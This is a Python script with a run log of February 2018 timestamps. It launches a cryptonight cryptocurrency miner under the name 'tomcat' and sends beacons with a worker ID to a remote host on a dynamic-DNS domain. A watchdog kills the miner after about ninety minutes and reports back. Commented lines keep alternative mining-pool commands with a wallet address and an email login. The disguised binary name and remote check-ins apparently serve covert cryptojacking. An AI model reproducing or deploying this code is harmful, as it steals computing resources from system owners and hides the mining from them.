import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:07.405154
#2018-02-17 16:10:04.326783
#2018-02-17 17:57:07.232207
#2018-02-17 19:45:01.798948
#2018-02-17 21:32:01.788900
#2018-02-17 23:16:07.503390
#2018-02-18 01:03:04.616710
#2018-02-18 02:51:01.355541
#2018-02-18 04:38:03.672288
#2018-02-18 06:29:01.597377
#2018-02-18 08:17:08.310264
#2018-02-18 10:05:05.694811
#2018-02-18 11:51:06.038264
#2018-02-18 13:36:06.722161
#2018-02-18 15:26:01.775562
#2018-02-18 17:15:02.569882
#2018-02-18 19:02:07.124157
#2018-02-18 20:49:06.664259
#2018-02-18 22:36:03.536721
#2018-02-19 00:24:03.525973
#2018-02-19 02:10:02.541610
#2018-02-19 03:56:03.556014
#2018-02-19 05:40:08.730880
#2018-02-19 07:28:01.604859
#2018-02-19 09:18:02.023487
#2018-02-19 11:07:08.841002
#2018-02-19 12:54:09.213645
#2018-02-19 14:41:03.866600
#2018-02-19 16:28:08.935566
#2018-02-19 18:14:09.053024
#2018-02-19 20:01:07.196420
#2018-02-19 21:51:06.998431
#2018-02-19 23:37:01.870403
#2018-02-20 01:22:06.758600
#2018-02-20 03:12:05.718722
#2018-02-20 04:59:06.680108
#2018-02-20 06:42:05.227995
#2018-02-20 08:27:07.139393
#2018-02-20 10:12:07.910246
#2018-02-20 11:56:09.093017
#2018-02-20 13:47:02.161037
#2018-02-20 15:31:07.506472
#2018-02-20 17:16:04.278328
#2018-02-20 19:05:06.185423
#2018-02-20 20:54:08.993861
#2018-02-20 22:39:07.903182
#2018-02-21 00:22:01.723524
#2018-02-21 02:07:04.670682
#2018-02-21 04:10:05.968332
#2018-02-21 05:57:01.742523
#2018-02-21 07:45:06.505880
#2018-02-21 09:32:04.870519
#2018-02-21 11:20:04.446706
#2018-02-21 13:08:08.540445
#2018-02-21 14:56:01.345443
#2018-02-21 16:44:07.457900
#2018-02-21 18:35:08.954974
#2018-02-21 20:20:04.174933
#2018-02-21 22:07:05.853497
#2018-02-21 23:56:05.360265
#2018-02-22 01:43:06.135613
#2018-02-22 03:31:06.566239
#2018-02-22 05:18:05.528013
#2018-02-22 07:04:07.592977
#2018-02-22 08:52:07.991683
#2018-02-22 10:41:04.652073
#2018-02-22 12:27:05.007998
#2018-02-22 14:12:04.905411
#2018-02-22 15:59:01.309526
#2018-02-22 17:45:14.185631
#2018-02-22 19:31:06.184561
#2018-02-22 21:23:04.611989
#2018-02-22 23:08:06.819621
#2018-02-23 00:56:07.522276
#2018-02-23 02:44:06.615659
#2018-02-23 04:33:02.082701
#2018-02-23 06:19:03.948366
#2018-02-23 08:05:09.673924
#2018-02-23 10:22:06.261657
#2018-02-23 12:17:01.528509
#2018-02-23 14:04:06.107326
#2018-02-23 15:54:05.854469
#2018-02-23 17:39:01.748949
#2018-02-23 19:27:04.912937
#2018-02-23 21:11:04.534511
#2018-02-23 22:58:05.622015
#2018-02-24 00:45:04.259922
#2018-02-24 02:39:06.640325
#2018-02-24 04:35:07.007540
#2018-02-24 06:20:07.577164
#2018-02-24 08:08:01.251883
#2018-02-24 09:52:04.268447
#2018-02-24 11:46:06.449212
#2018-02-24 13:36:06.771454
#2018-02-24 15:24:06.734887
#2018-02-24 17:13:06.699972
#2018-02-24 19:05:07.538380
#2018-02-24 20:53:06.757431
#2018-02-24 23:14:05.027498
#2018-02-25 02:39:05.567448
#2018-02-25 06:18:01.251242
#2018-02-25 11:40:05.447303